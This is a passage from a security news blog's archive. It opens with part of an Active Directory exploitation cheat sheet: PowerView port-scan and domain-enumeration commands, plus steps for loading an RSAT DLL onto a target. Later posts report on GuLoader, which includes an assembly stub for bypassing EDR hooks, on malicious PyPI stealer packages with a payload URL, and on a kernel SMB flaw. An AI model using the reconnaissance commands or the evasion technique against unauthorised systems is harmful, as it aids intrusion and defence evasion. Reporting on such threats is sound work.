Invoke-Portscan -Hosts "websrv.domain.local,wsus.domain.local,apps.domain.local" -TopPorts 50 echo websrv.domain.local | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080" Invoke-Portscan -Hosts 172.16.0.0/24 -T 4 -TopPorts 25 -oA localnet
#>

AD MODULE WITHOUT RSAT

The secret to being able to run AD enumeration commands from the AD Powershell module on a system without RSAT installed, is the DLL located in C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management on a system that has the RSAT installed.

Set up your AD VM, install RSAT, extract the dll and drop it to the target system used to enumerate the active directory.

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-Command get-adcom*

Domain Enumeration

DOMAIN

  • Get current domain
Get-NetDomain (PowerView)
Get-ADDomain (ActiveDirectory Module)
  • Get object of another domain
Get-NetDomain -Domain domain.local
Get-ADDomain -Identity domain.local
  • Get domain SID for the current domain
Get-DomainSID
(Get-ADDomain).DomainSID
  • Get domain policy for the current domain
Get-DomainPolicy
(Get-DomainPolicy)."system access"
  • Get domain policy for another domain
(Get-DomainPolicy -domain domain.local)."system access"
  • Get domain controllers for the current domain
Get-NetDomainController
Get-ADDomainController
  • Get domain controllers for another domain
Get-NetDomainController -Domain domain.local
Get-ADDomainController -DomainName domain.local -Discover

NETUSER
More on: To Get a list of users in the current domain





Infosec books | InfoSec tools | InfoSec services

Tags: Active Directory Exploitation Cheat Sheet

Dec 29 2022

INDUSTRIAL CYBERSECURITY USB THREAT REPORT 2022

Category: OT/ICSDISC @ 11:52 am
INDUSTRIAL CYBERSECURITY USB THREAT REPORT 2022 – by Honeywell Forge

INDUSTRIALcybersecurity-USB-threat-report-1-1Download

OT, ICS & SCADA Security

Infosec books | InfoSec tools | InfoSec services

Tags: Industrial Cybersecurity, Threat Report

Dec 29 2022

GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection

Category: Antivirus,Malware,Threat detectionDISC @ 11:30 am
GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection

An advanced malware downloader named GuLoader has recently been exposed by cybersecurity researchers at CrowdStrike. This advanced downloader has the capability to evade the detection of security software by adopting a variety of techniques.

While analyzing the shellcode of GuLoader, a brand-new anti-analysis technique was discovered by CrowdStrike through which researchers would be able to identify if the malware is operating in an adversarial environment or not. While this is done by examining the whole process memory for any VM-related strings.

Evolution of GuLoader Malware

On infected machines, GuLoader (aka CloudEyE) distributes remote access trojans like AgentTeslaFormBookNanocoreNETWIRERemcos, and the Parallax RAT using the VBS downloader. 

GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems. 

It has also been distributed through other channels, such as exploit kits and hacked websites. While it has evolved over time and has been used in various campaigns to deliver a range of malware, including ransomware, banking Trojans, and other types of malware.

A strong anti-analysis technique was also deployed by GuLoader in order to avoid detection in order to remain undetected. 

GuLoader exhibits a three-stage process, the VBScript script will first inject the shellcode embedded within it into the memory, then the next stage of the process will execute anti-analysis checks that will protect the code from being analyzed.

Furthermore, the shellcode also incorporates the same anti-analysis methods in order to avoid detection by third parties. It is through this shellcode that an attacker is able to download a final payload of their choice and execute it with the same anti-analysis methods as the original shellcode on the host that is compromised.

Detecting breakpoints used for code analysis is done with anti-debugging and anti-disassembling checks in the malware.

There is also a redundant code injection mechanism that can be used to avoid the use of a NTDLL.dll hook that is commonly used by antivirus programs and EDRs.

In order to detect and flag processes on Windows that may be suspicious, anti-malware engines use NTDLL.dll API hooking. 

Anti-Analysis Techniques

Here below we have mentioned the anti-analysis techniques used:-

  • Anti-Debugging
  • Anti-Virtual Machine
  • Process Hollowing

It was pointed out by experts that GuLoader remains a treacherous threat that is constantly evolving as it continues to develop. Furthermore, experts also provided indicators of compromise for the latest version of the downloader, as well as other key information.

GuLoader Malware Advanced Anti-Analysis

Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

Malware Analysis

Infosec books | InfoSec tools | InfoSec services

Tags: Antivirus Bypass Techniques, Evade Detection, Malware

Dec 28 2022

CISO roles continue to expand beyond technical expertise

Category: CISO,vCISODISC @ 12:20 pm
CISO roles continue to expand beyond technical expertise

CISO roles

The research shows the CISO seat to be relatively industry-agnostic—with 84% of CISOs having a career history of working across multiple sectors—with today’s CISOs expected to bring more breadth of leadership to their role as they move away from being technical experts.

Today’s CISOs are taking up the mantle of responsibilities that have traditionally fallen solely to the CIO, which is to act as the primary gateway from the tech department into the wider business and the outside marketplace,” said James Larkin, Managing Partner at Marlin Hawk.

“This widening scope requires CISOs to be adept communicators to the board, the broader business, and the marketplace of shareholders and customers. By thriving in the ‘softer’ skill sets of communication, leadership, and strategy, CISOs are now setting the new industry standards of today and, I predict, will be progressing into the board directors of tomorrow.”

Key findings from the report include:

  • CISO profiles have changed dramatically—36% of CISOs analyzed with a graduate degree received a higher degree in business administration or management. This is down 10% from last year (46% in 2021). Conversely, there has been an increase to 61% of CISOs receiving a higher degree in STEM subjects (up from 46% in 2021).
  • More CISOs are being hired internally—Approximately 62% of global CISOs were hired from another company, indicating a slight increase in the number of CISOs hired internally (38% hired internally compared to 36% in 2021), but a large gap remains in appropriate successors.
  • CISO turnover rates have declined—but still remain high with 45% of global CISOs having been in their current role for two years or less, down from 53% in 2021, with 18% turnover year-over-year.

CISO roles continue to become more complex

“I would say that you shouldn’t have the CISO title if you’re not actively defending your organization; you have to be in the trenches,” said Yonesy Núñez, CISO, Jack Henry Associates. “I also feel that over the last eight to 10 years, the CISO role has become a CISO plus role: CISO plus engineering, CISO plus physical security, CISO plus operational resiliency, or CISO plus product security. As a result, we’ve seen multiple CISOs that have done a great job with cybersecurity, fusion centers, SOC, and leadership. This has paved the way for the CISO office to become a business enabler and also a transformational technology function.”

Kevin Brown, a seasoned cybersecurity executive, added, “We have over 100 countries at this point with their own data privacy legislation that makes doing global business in a compliant manner trickier than it used to be. As a result, in most organizations we’re seeing a tighter connection and collaborative spirit between data officers, CISOs, legal teams and marketing. CISOs have to be in the know on all priorities for these different sectors of the business so they can take them into account when writing policies—it’s a more complex job than it ever used to be.”

More organizations are appointing CISOs from within

The research shows a decrease in the percentage of CISOs hired externally (62%) in the last year, compared to 2021 (64%), indicating a potential shift towards an organization’s next CISO already operating inside the business.

Larkin went on to say, “As the importance of information security has grown, boards of directors, regulators, and shareholders have demanded greater controls, better risk management as well as more people and departments focusing on defending a company and its assets. Fortunately, this has had the positive side effect of creating more internal succession for the CISO position—organizations can look for risk and control focused talent in more places than just the office of the CISO.”

“Now candidates are being internally promoted to the role of CISO from IT Risk, Operational Risk Management, IT Audit, Technology Risk & Controls, among others,” Larkin added. “Not only does this give regulators more comfort that there are multiple sets of eyes on this at the leadership level, but it has also vastly increased the size of the succession talent pool and is helping to future-proof the information security industry as a whole.”

CISO turnover rates are still high for several reasons

“The not-so-secret secret is that no CISO can accomplish much in one or two years. Most CISOs change roles because of one of three reasons,” shares Shamoun Siddiqui, CISO at Neiman Marcus Group.

“First, their skillset is not up to par, and they get quietly pushed out by the company. Due to the extremely high demand for security leaders, often individual contributors get elevated to the role of CISO, and they get overwhelmed within months. Second, they have an insurmountable task with unrealistic expectations, and there is a lack of support from their peers and from the leadership of the company. The company may be paying lip service to cybersecurity but may not be forward-thinking enough to make it a priority. Third, they just get enticed by a better offer from somewhere else. There is such a shortage of security professionals and security leaders that companies keep offering increasingly high salaries and benefits to CISOs.”

Another factor leading to high turnover is poor hiring decisions that are a result of a lack of scrutiny and due diligence in the recruiting process. While the immediate need may outweigh a more thorough vetting, fast tracking a CISO hire can have adverse effects if there are other, more suitable candidates out there.

Infosec books | InfoSec tools | InfoSec services

Tags: CISO

Dec 28 2022

400 Million Twitter Users’ Scraped Info Goes on Sale!

Category: Social networkDISC @ 10:51 am
400 Million Twitter Users’ Scraped Info Goes on Sale!

The sample data seen by Hackread.com shows that the sold information also includes records on top celebrities and political figures, such as Democratic Rep. Alexandria Ocasio-Cortez and Bollywood’s Salman Khan.

On December 23, 2022, a threat actor going by the handle “Ryushi” claimed to sell more than 400 million Twitter users’ personal details on BreachedForums, a cybercrime and hacking forum that surfaced as an alternative to the now-seized Raidforums.

As seen by Hackread.com, the sample data attached to the post contains private email addresses, usernames, follower counts, creation dates, and, in certain cases, the user’s phone numbers.

400 Million Twitter Users' Scraped Info Goes on Sale!
Post from the threat actor (Image credit: Waqas – Hackread.com)

The sample data also contains a variety of well-known user accounts including New York Democratic Rep. Alexandria Ocasio Cortez, Ethereum cryptocurrency founder Buterin, Indian actor Salman Khan and cybersecurity reporter Brian Krebs. 

It is worth mentioning that the latest data leak came just one month after a hacker leaked the contact and personal details of over 5.3 million Twitter users online. Both the earlier and latest incidents are now being investigated by Irish authorities.

The threat actor stated in the post that the data had been “scraped via a vulnerability” but did not specify any further details.

Further, they openly advised the CEO of the social media giant, Elon Musk, that he should buy this data directly from the hacker instead of “paying $276 million USD in GDPR breach fines like Facebook did” but does not specify a price at which the data is being sold.

400 Million Twitter Users' Scraped Info Goes on Sale!

Offering to conduct the “deal” through a middleman, the threat actor states, “After that, I will remove this thread and will not sell this info again. And data won’t be sold to anyone else, which will stop a lot of celebrities and politicians from Phishing, Crypto scams, Sim swapping, Doxxing, and other things that will make your users lose trust in you as a company and thus stunt the current growth and hype.”

Researchers who have seen the sample data believe that this alleged data leak is the result of an API flaw which allowed the threat actor to search any email addresses or phone numbers and return a Twitter profile.

This attack followed only months after Twitter entered into a consent order with the US Federal Trade Commission binding it to maintain a privacy and information security program for the next two decades.

The agreement ended a federal investigation into Twitter’s use of phone numbers and email addresses for advertising purposes when they were collected to be used for multi-factor authentication. Twitter also paid a $150 million civil penalty.

Therefore, if this data breach is verified, the impact on Twitter would be drastic both financially and socially. At the time of writing, the data was still up for grabs.

Tags: Twitter, Twitter CISO, Twitter Hack

Dec 27 2022

Critical “10-out-of-10” Linux kernel SMB hole – should you worry?

Category: Linux SecurityDISC @ 11:17 am
Critical “10-out-of-10” Linux kernel SMB hole – should you worry?

Just before the Christmas weekend – in fact, at about the same time that beleaguered password management service LastPass was admitting that, yes, your password vaults were stolen by criminals after all – we noticed a serious-sounding Linux kernel vulnerability that hit the news.

The alerts came from Trend Micro’s Zero Day Initiative (ZDI), probably best known for buying up zero-day security bugs via the popular Pwn2Own competitions, where bug-bounty hunting teams compete live on stage for potentially large cash prizes.

In return for sponsoring the prize money, the vendors of products ranging from operating systems and browsers to networked printers and internet routers hope to buy up brand new security flaws, so they can fix the holes responsibly. (To collect their prizes, participants have to provide a proper write-up, and agree not to share any information about the flaw until the vendor has had a fair chance to fix it.)

But ZDI doesn’t just deal in competitive bug hunting in its twice-a-year contests, so it also regularly puts out vulnerability notices for zero-days that were disclosed in more conventional ways, like this one, entitled Linux Kernel ksmbd Use-After-Free Remote Code Execution Vulnerability.

Serving Windows computers via Linux

SMB is short for server message block, and it’s the protocol that underpins Windows networking, so almost any Linux server that provides network services to Windows computers will be running software to support SMB.

As you can therefore imagine, SMB-related security bugs, especially ones that can be exploited over the network without the attacker needing to logon first, as is the case here, are potentially serious issues for most large corporate networks.

SMB support is also generally needed in home and small-business NAS (network attached storage) devices, which generally run Linux internally, and provide easy-to-use, plug-it-in-and-go file server features for small networks.

No need to learn Linux yourself, or to set up a full-blown server, or to learn how to configure Linux networking – just plug-and-play with the NAS device, which has SMB support built-in and ready to go for you.

Why the holiday timing?

In this case, the bug wasn’t deliberately disclosed on the night before the night before the night before Christmas in a not-so-ho-ho-ho bid to spoil your festive season by freaking you out.

And it wasn’t reported just before the weekend in a bid to bury bad PR by hoping you’d be vacation-minded enough either to miss the story completely or to shrug it off until the New Year.

The good news is that, as usually happens under the umbrella of responsible disclosure, the date for ZDI’s report was agreeed in advance, presumably when the flaw was disclosed, thus giving the Linux kernel team sufficient time to fix the problem properly, while nevertheless not allowing them to put the issue off indefinitely.

In this case, the bug report is listed as having happened on 2022-07-26, and what ZDI refers to as the “co-ordinated public release of [the] advisory” was set for 2022-12-22, which turns out to be exactly 150 days, if you count old-school style and include the full day at each end.

So, even though this bug has had some dramatic coverage over the holiday weekend, given that it was a remote code execution (RCE) hole in the Linux kernel itself, and came with a so-called CVSS score of 10/10, considered Critical

…it was patched in the Linux source code within just two days of disclosure, and the fix was accepted and packaged into the official Linux kernel source code in time for the release of Linux 5.15.61, back on 2022-08-17, just 23 days after the report first came in.

In other words, if you’ve updated your Linux kernel any time since then, you’re already safe, no matter what kernel compilation settings you or your distro used. (This includes 24 subsequent updates to the kernel 5.15 series, now at 5.15.85, along with any versions of kernel 6.0, kernel 6.1 and the still-in-candidate-stage kernel 6.2, all of which had their first releases after August 2022.)

Probably not the SMB software you suspect

Also, although it sounds at first glance as though this bug will inevitably affect any Linux server or device supporting Windows networking, that’s not true either.

Most sysadmins, and in our experience most NAS programmers, provide Windows SMB supprt via a long-running and well-respected open source toolkit called Samba, where the name Samba is simply the closest pronounceable word that the original developer, open-source luminary Andrew “Tridge” Tridgell OAM, could find to represent the abbreviation SMB.

Anyone who has used Samba will know that the software runs as a regular application, in what’s known as user space, in other words, without needing its own code running inside the kernel, where even modest bugs could have dangerous repercussions.

Indeed, the main Samba program file is called smbd, where the trailing -D is a typical Unixism standing for daemon, or background process – what Windows admins would call a service.

This bug, as you can see from the ZDI report, is in a kernel module called ksmbd, where the -D denotes a background service, the -SMB- denotes Windows networking support, and the K- means runs in kernel space, i.e. right inside the kernel itself.

At this point, you’re probably asking yourself, “Why bury the complexity of supporting SMB right into the kernel, given that we’ve already got a reliable and well-respected user-space product in the form of Samba, and given that the risks are much greater?”

Why, indeed?

As so often, there seem to be two main reasons: [A] because we can! and [B] because performance.

By pushing what are typically high-level software features down into the kernel, you can often improve performance, though you almost always pay the price of a corresponding, and possibly considerable, decrease in safety and security.

What to do?

  • Check if you have a Linux kernel based on any release on or after 5.15.61 (dated 2022-08-17). If so, this bug is fixed in the source code. No matter what kernel compilation options you (or your distro maker) choose, the bug can’t and won’t exist on your system.
  • Check if your Linux kernel build even includes ksmbd. Most popular distros neither compile it in, nor build it as a module, so you can’t load it or activate it, even by mistake.
  • Check with your vendor if you are using an applicance such as a NAS box or other device that supports connections from Windows computers. Chances are that your NAS device won’t be using ksmbd, even if it still has a kernel version that is vulnerable in theory.
  • If you’re using ksmbd out of choice, consider re-evaluating your risk. Make sure you measure the true increase in performance you’ve achieved, and decide whether the payoff is really worth it.

COMMANDS YOU CAN USE TO CHECK YOUR EXPOSURE

Any Linux from 5.15.61 on, or any 6.x, is already patched. 
To check your Linux version:

  $ uname -o -r
  6.1.1 GNU/Linux     

To see if this kernel feature is compiled in, you can dump the 
compile-time configuration of the running kernel:

  $ zcat /proc/config.gz | grep SMB_SERVER
  # CONFIG_SMB_SERVER is not set

If this compile-time configuration setting is unset, or set to 
"n" for no, the feature wasn't built at all.

If it says "y" for yes, then the kernel SMB server is compiled 
right into your kernel, so ensure you have a patched version.

If it says "m" for module, then the kernel build probably 
includes a run-time module that can be loaded on demand.

To see if your kernel has a loadable module available:

  $ /sbin/modprobe --show ksmbd
  modprobe: FATAL: Module ksmbd not found in directory /lib/modules/6.1.1

Note that "--show" means "do not actually do it, just show 
if loading it would actually work or not".

To see if your system has the ksmbd module already active:

  $ lsmod | grep ksmbd

If you see no output, the module wasn’t matched in the list.

To stop the module loading in case it ever shows up, add a 
file with a name such as ksmbd.conf to the directory 
/lib/modules.d or /etc/modules.d with this line in it:

  blacklist ksmbd

Mastering Linux Security and Hardening: Protect your Linux systems from intruders, malware attacks, and other cyber threats

Infosec books | InfoSec tools | InfoSec services

Tags: Linux Security, Mastering Linux Security and Hardening

Dec 27 2022

Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

Category: Malware,PythonDISC @ 10:48 am
Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developers’ machines in order to steal their information.

As they dug deeper, they discovered a new stealer variant with many different names. While apart from this, the source code of the program reveals that it is a straightforward copy of the old Stealer, W4SP. 

Attack Chain to Deploy Malware

A stealer in this case dropped directly into the main.py file rather than obfuscating the code or being obvious about the attempts to escape detection.

Only one instance has been found in which multiple stages were used in order to obfuscate and obscure the attacker’s intentions. In this case, the attacker used a package called chazz to pull obfuscated code from the klgrth.io website, using a simple first stage to get it.

There is a great deal of similarity between the first stage of the stealer code and the injector code. While this has been obfuscated with BlankOBF, it’s an obfuscation program. As soon as it is de-obfuscated, it reveals the Leaf $tealer.

Malicious Packages

Listed below are packages that feature similar IOC and apart from this, what we can expect is this list will grow over the coming months and years:-

  • modulesecurity – “Celestial Stealer”
  • informmodule – “Leaf $tealer”
  • chazz – first stage that pull from https://www.klgrth.io/paste/j2yvv/raw which contains the obfuscated code shown above
  • randomtime – “ANGEL stealer”
  • proxygeneratorbil – “@skid STEALER”
  • easycordey – “@skid Stealer”
  • easycordeyy – “@skid Stealer”
  • tomproxies – “@skid STEALER”
  • sys-ej – “Hyperion Obfuscated code”
  • infosys – “@734 Stealer”
  • sysuptoer – “BulkFA Stealer”
  • nowsys – “ANGEL Stealer”
  • upamonkws – “PURE Stealer”
  • captchaboy – “@skid STEALER”
  • proxybooster – “Fade Stealer”

W4SP Copies

W4SP’s original publication in loTus’s repository has been disabled by GitHub staff due to the violation of the T&C of GitHub, and as a result, it will be not found anymore.

It has been Phylum’s mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.

It was discovered that several copies of W4SP-Stealer started flashing under different names as soon as the repo for W4SP-Stealer was removed. This new stealer is even being distributed through PyPI by threat actors already, which is a sign that it is becoming a real threat.

It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.

  • Satan Stealer
  • angel-stealer

There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop. 

W4SP Stealer will likely remain part of the scene for quite some time to come, as will their imitations and other variants.

There will be a constant increase in their number of attempts, their persistence, and their sophistication as time passes. However, Phylum ensured that it would mitigate and block supply chain attacks since its platform is capable enough in doing so.

Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

Tags: Information Stealer Malware

Dec 26 2022

Cybersecurity in 2022: It’s Not Getting Easier

Category: Cyber careerDISC @ 3:07 pm
Cybersecurity in 2022: It’s Not Getting Easier

Cybersecurity in 2022: It’s Not Getting Easier

by Mike Rothman 

As we wrap up the year, it always makes sense to take a look back and see what worked and what didn’t; what we can do better and what we have to accept. When 2021 ended, it was pretty bad. We were still trying to navigate COVID-19 and plan for a return to in-person work. But the markets were decent, the investment dollars kept flowing and while effective cybersecurity was hard, there was some optimism that it would get better.

Well, it didn’t. In hindsight, it should have been obvious that a recession was coming. Companies of all shapes and sizes tightened their belts, expecting security to do more with less. Yeah, you’ve heard that story before. Of course, you probably couldn’t have projected Russia’s attack on Ukraine nor planned for the cybergyrations necessary to determine if you were within the blast radius of the attack(s).

Data and workloads continued to move to the cloud unabated, putting pressure on data governance policies and visibility efforts to track the data. Many organizations now expect to run their environments (both development and infrastructure) using CI/CD pipelines, and they haven’t been proactive in understanding how to protect them.

So, yeah, things got harder for security professionals in 2022. But it wasn’t all bad. Security analytics continued to advance, improving detection. Organizations started making progress on deploying zero-trust architectures for both their perimeters and identity environments. Security budgets weren’t impacted until late in the year, as security tends to be one of the last expenditures to be impacted in a slowdown. Ultimately a couple of realities set in this year and for 2023 to improve, we’re going to have to address them.

  1. No juice: I was involved in a number of cloud and container security projects with enterprises this year. In each one, the security team had difficulty getting the dev teams and business influencers to care. To be clear, they said they cared, but their actions spoke louder. They don’t care about security until something bad happens. Then, they are happy to throw security under the bus. The mandate for change will need to come from the executive suite. That’s the only way to align the incentives toward protecting data.
  2. Identities run amok: As workloads and data move to the cloud, implementing an effective, enterprise-wide identity and access management (IAM) strategy is the critical arbiter of success. It’s also hard to retrofit an effective tenancy and IAM structure once workloads are deployed, so there isn’t a lot of time to waste to get your arms around IAM.
  3. AppSec still lags: As exciting as it is to think about having developers build secure code, they are neither trained nor incentivized to do so. Thus, they don’t. Yes, you can (and must) build security tests into the pipelines. You should push (hard!) to break builds that have critical security errors. But developers have been (and will continue to) push back on being responsible for application security, so we’ll need to find a middle ground.
  4. Skills upgrade: Sadly, with many companies reducing headcount, thousands of qualified security folks are looking for work. Yes, many of them get snapped up quickly, but not all. Now would be a great time to invest in your security skills, but too many organizations responded to the slowdown by freezing hiring and don’t use downturns as an opportunity to upgrade their personnel. The savviest managers buy when everyone else is selling; many organizations were selling in 2022 (and will continue to do so in 2023). If you can, add hard-to-find skills (like cloud security and AppSec) now.
  5. Regulatory uncertainty: Between the ongoing privacy litigation in Europe and the new software bill of materials (SBOM) mandate in the U.S., it remains hard to know what “compliance” really means and what it will take to pass assessments. Of course, an effective security program should address most compliance requirements, but there will continue to be uncertainty, so expect some unplanned work as we get clarity on the expectations.

I could go on, but that’s a pretty good overview. I alluded a bit to what’s coming in 2023, but we’ll dig into that in greater depth during our Predict 2023 virtual conference on January 12, 2023. You can register here. Have a happy and safe holiday season, and we’ll see you at Predict in a few weeks.

insider threat cybersecurity alert fatigue

Cybersecurity Labor Shortage Grows Worse in U.S. And Worldwide: Report

Global Cyber Security Labor Shortage and International Business Risk


Infosec books | InfoSec tools | InfoSec services

Tags: cyber security shortage

Dec 26 2022

GuLoader implements new evasion techniques

Category: Cyber Threats,Security vulnerabilitiesDISC @ 1:08 pm
GuLoader implements new evasion techniques

Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader.

CrowdStrike researchers d a detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka CloudEyE).

GuLoader uses a polymorphic shellcode loader to avoid traditional security solutions, the experts mapped all embedded DJB2 hash values for every API used by the malicious code.

The malware uses an anti-analysis technique to avoid execution in virtualized environments.

“In dissecting GuLoader’s shellcode, CrowdStrike revealed a new anti-analysis technique meant to detect if the malware is running in a hostile environment by scanning the entire process memory for any Virtual Machine (VM)-related strings.” reads the analysis published by CrowdStrike.

“New redundant code injection mechanism means to ensure code execution by using  inline assembly to bypass user mode hooks from security solutions.”

GuLoader first appeared on the threat landscape in 2019, it was used by threat actors to download multiple remote access trojans (RATs) such as AgentTeslaFormBookNanocore, NETWIRE and the Parallax RAT.

Early versions of GuLoader were distributed via spam messages using attachments containing the malicious executable. Recent variants were delivered via a Visual Basic Script (VBS) file.

“GuLoader also started employing advanced anti-analysis techniques to evade detection, such as anti-debug, anti-sandbox, anti-VM and anti-detection to make analysis difficult.” reads the analysis.

A recent GuLoader variant analyzed by the experts exhibits a multistage deployment:

  • The first stage uses a VBS dropper file to drop a second-stage packed payload into a registry key. It then uses a PowerShell script to execute and unpack the second stage payload from the registry key within memory. 
  • The second stage payload performs all anti-analysis routines (described below), creates a Windows process (e.g., an ieinstal.exe) and injects the same shellcode into the new process.
  • The third stage reimplements all the anti-analysis techniques, downloads the final payload from a remote server and executes it on the victim’s machine.

The malware implements anti-debugging and anti-disassembling checks to detect the presence of breakpoints used for the analysis of code.

GuLoader

The researchers also noticed the use of a redundant code injection mechanism to avoid NTDLL.dll hooks used by antivirus and EDR solutions to detect malicious activities.

“It then maps that section via NtMapViewofSection on the suspended process.” continues the analysis. “If this injection technique fails, it uses the following redundancy method:

a. NtAllocateVirtualMemory by invoking the inline assembly instructions (without calling ntdll.dll,  to bypass AV/EDR User Mode hooks) of that function, using the following assembly stub:

mov eax,18                           
mov edx,ntdll.77178850       
call edx                           
ret 18 

It uses NtWriteProcessMemory to copy the same shellcode onto that virtually allocated address. It uses NtWriteProcessMemory to copy the same shellcode onto that virtually allocated address.”

Experts pointed out that GuLoader remains a dangerous threat that constantly evolves, they also shared Indicators of Compromise for the latest variant of the downloader.

Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

Metasploit Penetration Testing Cookbook – Third Edition: Evade antiviruses, bypass firewalls, and exploit complex environments with the most widely used penetration testing framework

Infosec books | InfoSec tools | InfoSec services

Tags: Antivirus Bypass, evasion techniques, Metasploit

« Previous PageNext Page »